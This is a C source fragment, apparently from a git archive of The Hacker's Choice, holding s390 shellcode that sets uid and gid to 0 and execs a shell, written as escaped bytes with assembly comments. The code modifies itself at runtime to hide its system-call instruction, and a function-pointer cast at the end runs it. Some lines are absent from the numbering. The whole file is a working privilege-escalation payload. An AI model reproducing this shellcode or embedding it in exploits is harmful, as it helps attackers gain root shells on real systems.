1 /* setuid/setgid 0 execve s390 shellcode */
2 /* code by jcyberpunk@thehackerschoice.com */
5 "\x0c\x10" /* bassm %r1,%r0 */
6 "\x41\x90\x10\x48" /* la %r9,72(%r1) */
7 "\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
8 "\xa7\x68\x04\x56" /* lhi %r6,1110 */
9 "\x1a\x6a" /* ar %r6,%r10 */
10 "\x42\x60\x10\x48" /* stc %r6,72(%r1) */
11 "\x17\x22" /* xr %r2,%r2 */
12 "\x0d\xe9" /* basr %r14,%r9 */
13 "\xa7\x68\x04\x7a" /* lhi %r6,1146 */
14 "\x1a\x6a" /* ar %r6,%r10 */
15 "\x42\x60\x10\x49" /* stc %r6,73(%r1) */
16 "\x0d\xe9" /* basr %r14,%r9 */
17 "\xa7\x68\x04\x57" /* lhi %r6,1111 */
18 "\x1a\x6a" /* ar %r6,%r10 */
19 "\x42\x60\x10\x49" /* stc %r6,73(%r1) */
20 "\x41\x20\x10\x4c" /* la %r2,76(%r1) */
21 "\x50\x20\x10\x54" /* st %r2,84(%r1) */
22 "\x41\x30\x10\x54" /* la %r3,84(%r1) */
23 "\x17\x44" /* xr %r4,%r4 */
24 "\x42\x40\x10\x53" /* stc %r4,83(%r1) */
25 "\x50\x40\x10\x58" /* st %r4,88(%r1) */
26 "\x41\x40\x10\x58" /* la %r4,88(%r1) */
27 "\x0d\xe9" /* basr %r14,%r9 */
28 "\x0b\x17" /* svc n after self-modification */
29 "\x07\xfe" /* br %r14 */
31 "\x69\x6e\x2f\x73" /* in/s */
36 void (*z)()=(void*)shellcode;
projects / oweals / thc-archive.git / blob